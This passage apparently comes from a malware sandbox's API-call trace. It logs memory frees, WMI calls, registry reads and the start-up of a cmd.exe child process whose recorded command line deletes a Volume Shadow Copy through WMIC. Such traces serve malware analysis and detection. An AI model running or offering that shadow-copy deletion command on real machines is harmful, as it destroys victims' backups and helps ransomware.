0xff172ab0 [0089.542] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0089.543] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0089.543] free (_Block=0x13cef0) [0089.543] free (_Block=0x13d080) [0089.543] IEnumWbemClassObject:Next (in: This=0x1e03d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf8d0, puReturned=0x1cf8e0 | out: apObjects=0x1cf8d0*=0x0, puReturned=0x1cf8e0*=0x0) returned 0x1 [0089.544] IUnknown:Release (This=0x1e03d18) returned 0x0 [0089.545] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0089.545] free (_Block=0x13cca0) [0089.545] free (_Block=0x13ccc0) [0089.545] GetCurrentThreadId () returned 0x8ac [0089.545] ??0CHString@@QEAA@PEBG@Z () returned 0x1cfaa8 [0089.546] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x1cfaa8 [0089.546] lstrlenW (lpString="LIST") returned 4 [0089.546] lstrlenW (lpString="delete") returned 6 [0089.546] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0089.546] lstrlenW (lpString="ASSOC") returned 5 [0089.546] lstrlenW (lpString="delete") returned 6 [0089.546] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0089.546] lstrlenW (lpString="GET") returned 3 [0089.546] lstrlenW (lpString="delete") returned 6 [0089.546] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0089.546] ??1CHString@@QEAA@XZ () returned 0x4f34de01 [0089.546] WbemLocator:IUnknown:Release (This=0x1e03c18) returned 0x0 [0089.546] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0089.546] _kbhit () returned 0x0 [0089.547] free (_Block=0x136f20) [0089.547] free (_Block=0x13cac0) [0089.547] free (_Block=0x13caa0) [0089.547] free (_Block=0x13ca80) [0089.547] free (_Block=0x13ca60) [0089.547] free (_Block=0x1370a0) [0089.547] free (_Block=0x13cb40) [0089.547] free (_Block=0x1385c0) [0089.547] free (_Block=0x13d020) [0089.547] free (_Block=0x13cbc0) [0089.548] free (_Block=0x13cfa0) [0089.548] free (_Block=0x13cae0) [0089.548] free (_Block=0x13cbe0) [0089.548] free (_Block=0x137140) [0089.548] free (_Block=0x136e00) [0089.548] free (_Block=0x13cff0) [0089.548] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0089.548] free (_Block=0x13ce20) [0089.548] free (_Block=0x13cb00) [0089.548] free (_Block=0x13cb20) [0089.548] free (_Block=0x13cf30) [0089.548] free (_Block=0x13cb60) [0089.548] free (_Block=0x137ee0) [0089.548] free (_Block=0x137f30) [0089.548] free (_Block=0x137f80) [0089.548] free (_Block=0x13cb80) [0089.548] free (_Block=0x136a20) [0089.548] free (_Block=0x136de0) [0089.548] free (_Block=0x138040) [0089.548] free (_Block=0x136dc0) [0089.548] free (_Block=0x138000) [0089.548] free (_Block=0x136d60) [0089.548] free (_Block=0x136d80) [0089.548] free (_Block=0x136c40) [0089.549] free (_Block=0x136c60) [0089.549] free (_Block=0x136be0) [0089.549] free (_Block=0x136c00) [0089.549] free (_Block=0x136ca0) [0089.549] free (_Block=0x136cc0) [0089.549] free (_Block=0x136d00) [0089.549] free (_Block=0x136d20) [0089.549] free (_Block=0x136b20) [0089.549] free (_Block=0x136b40) [0089.549] free (_Block=0x136ac0) [0089.549] free (_Block=0x136ae0) [0089.549] free (_Block=0x136b80) [0089.549] free (_Block=0x136ba0) [0089.549] free (_Block=0x136a60) [0089.549] free (_Block=0x136a80) [0089.549] free (_Block=0x1369d0) [0089.549] free (_Block=0x1369a0) [0089.549] free (_Block=0x136e90) [0089.549] WbemLocator:IUnknown:Release (This=0x1df1390) returned 0x2 [0089.549] WbemLocator:IUnknown:Release (This=0x1e03b28) returned 0x0 [0089.550] WbemLocator:IUnknown:Release (This=0x1e03a98) returned 0x0 [0089.550] WbemLocator:IUnknown:Release (This=0x1df1390) returned 0x1 [0089.550] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0089.550] WbemLocator:IUnknown:Release (This=0x1df1390) returned 0x0 [0089.550] free (_Block=0x13c9e0) [0089.550] free (_Block=0x13ca00) [0089.550] free (_Block=0x138540) [0089.551] free (_Block=0x13ca20) [0089.551] free (_Block=0x13ca40) [0089.551] free (_Block=0x138580) [0089.551] free (_Block=0x13c860) [0089.551] free (_Block=0x13c880) [0089.551] free (_Block=0x1383c0) [0089.551] free (_Block=0x13c8a0) [0089.551] free (_Block=0x13c8c0) [0089.551] free (_Block=0x138400) [0089.551] free (_Block=0x13c7e0) [0089.551] free (_Block=0x13c800) [0089.551] free (_Block=0x138340) [0089.551] free (_Block=0x13c820) [0089.551] free (_Block=0x13c840) [0089.551] free (_Block=0x138380) [0089.551] free (_Block=0x13c960) [0089.551] free (_Block=0x13c980) [0089.551] free (_Block=0x1384c0) [0089.551] free (_Block=0x13c9a0) [0089.551] free (_Block=0x13c9c0) [0089.551] free (_Block=0x138500) [0089.551] free (_Block=0x13c760) [0089.551] free (_Block=0x13c780) [0089.551] free (_Block=0x1382c0) [0089.551] free (_Block=0x13c7a0) [0089.552] free (_Block=0x13c7c0) [0089.552] free (_Block=0x138300) [0089.552] free (_Block=0x13c8e0) [0089.552] free (_Block=0x13c900) [0089.552] free (_Block=0x138440) [0089.552] free (_Block=0x13c920) [0089.552] free (_Block=0x13c940) [0089.552] free (_Block=0x138480) [0089.552] free (_Block=0x13c6a0) [0089.552] free (_Block=0x13c6c0) [0089.552] free (_Block=0x138200) [0089.552] free (_Block=0x13c560) [0089.552] free (_Block=0x13c580) [0089.552] free (_Block=0x1380c0) [0089.552] free (_Block=0x136e50) [0089.552] free (_Block=0x136e70) [0089.552] free (_Block=0x138080) [0089.552] free (_Block=0x13c5e0) [0089.552] free (_Block=0x13c600) [0089.552] free (_Block=0x138140) [0089.552] free (_Block=0x13c6e0) [0089.552] free (_Block=0x13c700) [0089.552] free (_Block=0x138240) [0089.552] free (_Block=0x13c5a0) [0089.553] free (_Block=0x13c5c0) [0089.553] free (_Block=0x138100) [0089.553] free (_Block=0x13c620) [0089.553] free (_Block=0x13c640) [0089.553] free (_Block=0x138180) [0089.553] free (_Block=0x13c660) [0089.553] free (_Block=0x13c680) [0089.553] free (_Block=0x1381c0) [0089.553] free (_Block=0x13c720) [0089.553] free (_Block=0x13c740) [0089.553] free (_Block=0x138280) [0089.553] CoUninitialize () [0089.573] exit (_Code=0) [0089.573] free (_Block=0x13cd30) [0089.573] free (_Block=0x137ea0) [0089.573] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0089.573] free (_Block=0x136f40) [0089.573] free (_Block=0x136a40) [0089.573] free (_Block=0x137e60) [0089.573] free (_Block=0x137e20) [0089.573] free (_Block=0x137dd0) [0089.574] free (_Block=0x137d90) [0089.574] free (_Block=0x137d30) [0089.574] free (_Block=0x135a90) [0089.574] free (_Block=0x135a50) [0089.574] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0089.574] free (_Block=0x13cec0) Thread: id = 117 os_tid = 0x8bc Thread: id = 118 os_tid = 0x8dc Thread: id = 119 os_tid = 0x8ec Thread: id = 120 os_tid = 0x8fc Thread: id = 121 os_tid = 0x90c Process: id = "12" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x19db000" os_pid = "0xaac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 122 os_tid = 0xacc [0089.659] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef9d0 | out: lpSystemTimeAsFileTime=0x1ef9d0*(dwLowDateTime=0x3d0f27b0, dwHighDateTime=0x1d68245)) [0089.659] GetCurrentProcessId () returned 0xaac [0089.659] GetCurrentThreadId () returned 0xacc [0089.659] GetTickCount () returned 0x114c321 [0089.659] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef9d8 | out: lpPerformanceCount=0x1ef9d8*=20955184482) returned 1 [0089.660] GetModuleHandleW (lpModuleName=0x0) returned 0x4a190000 [0089.660] __set_app_type (_Type=0x1) [0089.660] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1b7810) returned 0x0 [0089.660] __getmainargs (in: _Argc=0x4a1da608, _Argv=0x4a1da618, _Env=0x4a1da610, _DoWildCard=0, _StartInfo=0x4a1be0f4 | out: _Argc=0x4a1da608, _Argv=0x4a1da618, _Env=0x4a1da610) returned 0 [0089.661] GetCurrentThreadId () returned 0xacc [0089.661] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xacc) returned 0x3c [0089.661] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0089.661] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0089.661] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0089.661] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0089.661] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef968 | out: phkResult=0x1ef968*=0x0) returned 0x2 [0089.661] VirtualQuery (in: lpAddress=0x1ef950, lpBuffer=0x1ef8d0, dwLength=0x30 | out: lpBuffer=0x1ef8d0*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0089.662] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1ef8d0, dwLength=0x30 | out: lpBuffer=0x1ef8d0*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0089.662] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1ef8d0, dwLength=0x30 | out: lpBuffer=0x1ef8d0*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0089.662] VirtualQuery (in: lpAddress=0xf4000, lpBuffer=0x1ef8d0, dwLength=0x30 | out: lpBuffer=0x1ef8d0*(BaseAddress=0xf4000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0089.662] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1ef8d0, dwLength=0x30 | out: lpBuffer=0x1ef8d0*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0089.662] GetConsoleOutputCP () returned 0x1b5 [0089.662] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1cbfe0 | out: lpCPInfo=0x4a1cbfe0) returned 1 [0089.662] SetConsoleCtrlHandler (HandlerRoutine=0x4a1b3184, Add=1) returned 1 [0089.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0089.662] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0089.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0089.662] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1be194 | out: lpMode=0x4a1be194) returned 1 [0089.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0089.663] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0089.663] _get_osfhandle (_FileHandle=0) returned 0x3 [0089.663] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1be198 | out: lpMode=0x4a1be198) returned 1 [0089.663] _get_osfhandle (_FileHandle=0) returned 0x3 [0089.663] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0089.663] GetEnvironmentStringsW () returned 0x298b90* [0089.663] GetProcessHeap () returned 0x280000 [0089.663] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xa7c) returned 0x299620 [0089.663] FreeEnvironmentStringsW (penv=0x298b90) returned 1 [0089.663] GetProcessHeap () returned 0x280000 [0089.663] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x8) returned 0x298a10 [0089.664] GetEnvironmentStringsW () returned 0x298b90* [0089.664] GetProcessHeap () returned 0x280000 [0089.664] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xa7c) returned 0x29a0b0 [0089.664] FreeEnvironmentStringsW (penv=0x298b90) returned 1 [0089.664] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee828 | out: phkResult=0x1ee828*=0x44) returned 0x0 [0089.664] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee820, lpData=0x1ee840, lpcbData=0x1ee824*=0x1000 | out: lpType=0x1ee820*=0x0, lpData=0x1ee840*=0x18, lpcbData=0x1ee824*=0x1000) returned 0x2 [0089.664] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee820, lpData=0x1ee840, lpcbData=0x1ee824*=0x1000 | out: lpType=0x1ee820*=0x4, lpData=0x1ee840*=0x1, lpcbData=0x1ee824*=0x4) returned 0x0 [0089.664] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee820, lpData=0x1ee840, lpcbData=0x1ee824*=0x1000 | out: lpType=0x1ee820*=0x0, lpData=0x1ee840*=0x1, lpcbData=0x1ee824*=0x1000) returned 0x2 [0089.664] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee820, lpData=0x1ee840, lpcbData=0x1ee824*=0x1000 | out: lpType=0x1ee820*=0x4, lpData=0x1ee840*=0x0, lpcbData=0x1ee824*=0x4) returned 0x0 [0089.664] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee820, lpData=0x1ee840, lpcbData=0x1ee824*=0x1000 | out: lpType=0x1ee820*=0x4, lpData=0x1ee840*=0x40, lpcbData=0x1ee824*=0x4) returned 0x0 [0089.664] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee820, lpData=0x1ee840, lpcbData=0x1ee824*=0x1000 | out: lpType=0x1ee820*=0x4, lpData=0x1ee840*=0x40, lpcbData=0x1ee824*=0x4) returned 0x0 [0089.664] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee820, lpData=0x1ee840, lpcbData=0x1ee824*=0x1000 | out: lpType=0x1ee820*=0x0, lpData=0x1ee840*=0x40, lpcbData=0x1ee824*=0x1000) returned 0x2 [0089.664] RegCloseKey (hKey=0x44) returned 0x0 [0089.664] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee828 | out: phkResult=0x1ee828*=0x44) returned 0x0 [0089.664] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee820, lpData=0x1ee840, lpcbData=0x1ee824*=0x1000 | out: lpType=0x1ee820*=0x0, lpData=0x1ee840*=0x40, lpcbData=0x1ee824*=0x1000) returned 0x2 [0089.664] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee820, lpData=0x1ee840, lpcbData=0x1ee824*=0x1000 | out: lpType=0x1ee820*=0x4, lpData=0x1ee840*=0x1, lpcbData=0x1ee824*=0x4) returned 0x0 [0089.664] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee820, lpData=0x1ee840, lpcbData=0x1ee824*=0x1000 | out: lpType=0x1ee820*=0x0, lpData=0x1ee840*=0x1, lpcbData=0x1ee824*=0x1000) returned 0x2 [0089.664] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee820, lpData=0x1ee840, lpcbData=0x1ee824*=0x1000 | out: lpType=0x1ee820*=0x4, lpData=0x1ee840*=0x0, lpcbData=0x1ee824*=0x4) returned 0x0 [0089.664] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee820, lpData=0x1ee840, lpcbData=0x1ee824*=0x1000 | out: lpType=0x1ee820*=0x4, lpData=0x1ee840*=0x9, lpcbData=0x1ee824*=0x4) returned 0x0 [0089.664] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee820, lpData=0x1ee840, lpcbData=0x1ee824*=0x1000 | out: lpType=0x1ee820*=0x4, lpData=0x1ee840*=0x9, lpcbData=0x1ee824*=0x4) returned 0x0 [0089.665] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee820, lpData=0x1ee840, lpcbData=0x1ee824*=0x1000 | out: lpType=0x1ee820*=0x0, lpData=0x1ee840*=0x9, lpcbData=0x1ee824*=0x1000) returned 0x2 [0089.665] RegCloseKey (hKey=0x44) returned 0x0 [0089.665] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51743e [0089.665] srand (_Seed=0x5f51743e) [0089.665] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete" [0089.665] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'\" delete" [0089.665] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1cc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0089.665] GetProcessHeap () returned 0x280000 [0089.665] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x218) returned 0x29ab40 [0089.665] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x29ab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0089.665] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1bf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0089.665] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1bf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0089.665] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1bf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0089.665] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0089.665] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0089.665] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0089.665] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0089.665] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0089.665] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0089.666] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0089.666] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0089.666] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0089.666] GetProcessHeap () returned 0x280000 [0089.666] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x299620 | out: hHeap=0x280000) returned 1 [0089.666] GetEnvironmentStringsW () returned 0x298b90* [0089.666] GetProcessHeap () returned 0x280000 [0089.666] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xa94) returned 0x29ad60 [0089.666] FreeEnvironmentStringsW (penv=0x298b90) returned 1 [0089.666] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1bf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0089.666] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1bf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0089.666] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0089.666] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0089.666] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0089.666] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0089.666] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0089.666] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0089.666] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0089.666] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0089.666] GetProcessHeap () returned 0x280000 [0089.666] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x5c) returned 0x29b800 [0089.666] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef630 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0089.666] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef630, lpFilePart=0x1ef610 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1ef610*="Desktop") returned 0x25 [0089.666] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0089.667] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef340 | out: lpFindFileData=0x1ef340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x29b870 [0089.667] FindClose (in: hFindFile=0x29b870 | out: hFindFile=0x29b870) returned 1 [0089.667] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1ef340 | out: lpFindFileData=0x1ef340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x29b870 [0089.667] FindClose (in: hFindFile=0x29b870 | out: hFindFile=0x29b870) returned 1 [0089.667] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0089.667] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1ef340 | out: lpFindFileData=0x1ef340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x29b870 [0089.667] FindClose (in: hFindFile=0x29b870 | out: hFindFile=0x29b870) returned 1 [0089.667] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0089.667] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0089.667] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0089.667] GetProcessHeap () returned 0x280000 [0089.667] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29ad60 | out: hHeap=0x280000) returned 1 [0089.667] GetEnvironmentStringsW () returned 0x29b870* [0089.667] GetProcessHeap () returned 0x280000 [0089.668] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xae8) returned 0x29c360 [0089.668] FreeEnvironmentStringsW (penv=0x29b870) returned 1 [0089.668] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1cc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0089.668] GetProcessHeap () returned 0x280000 [0089.668] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29b800 | out: hHeap=0x280000) returned 1 [0089.668] GetProcessHeap () returned 0x280000 [0089.668] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4016) returned 0x29ce50 [0089.668] GetProcessHeap () returned 0x280000 [0089.668] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xe4) returned 0x299680 [0089.668] GetProcessHeap () returned 0x280000 [0089.668] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29ce50 | out: hHeap=0x280000) returned 1 [0089.668] GetConsoleOutputCP () returned 0x1b5 [0089.668] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1cbfe0 | out: lpCPInfo=0x4a1cbfe0) returned 1 [0089.668] GetUserDefaultLCID () returned 0x409 [0089.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1c7b50, cchData=8 | out: lpLCData=":") returned 2 [0089.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef740, cchData=128 | out: lpLCData="0") returned 2 [0089.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef740, cchData=128 | out: lpLCData="0") returned 2 [0089.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef740, cchData=128 | out: lpLCData="1") returned 2 [0089.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1da740, cchData=8 | out: lpLCData="/") returned 2 [0089.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1da4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0089.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1da460, cchData=32 | out: lpLCData="Tue") returned 4 [0089.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1da420, cchData=32 | out: lpLCData="Wed") returned 4 [0089.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1da3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0089.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1da3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0089.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1da360, cchData=32 | out: lpLCData="Sat") returned 4 [0089.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1da700, cchData=32 | out: lpLCData="Sun") returned 4 [0089.669] GetLocaleInfoW (in: 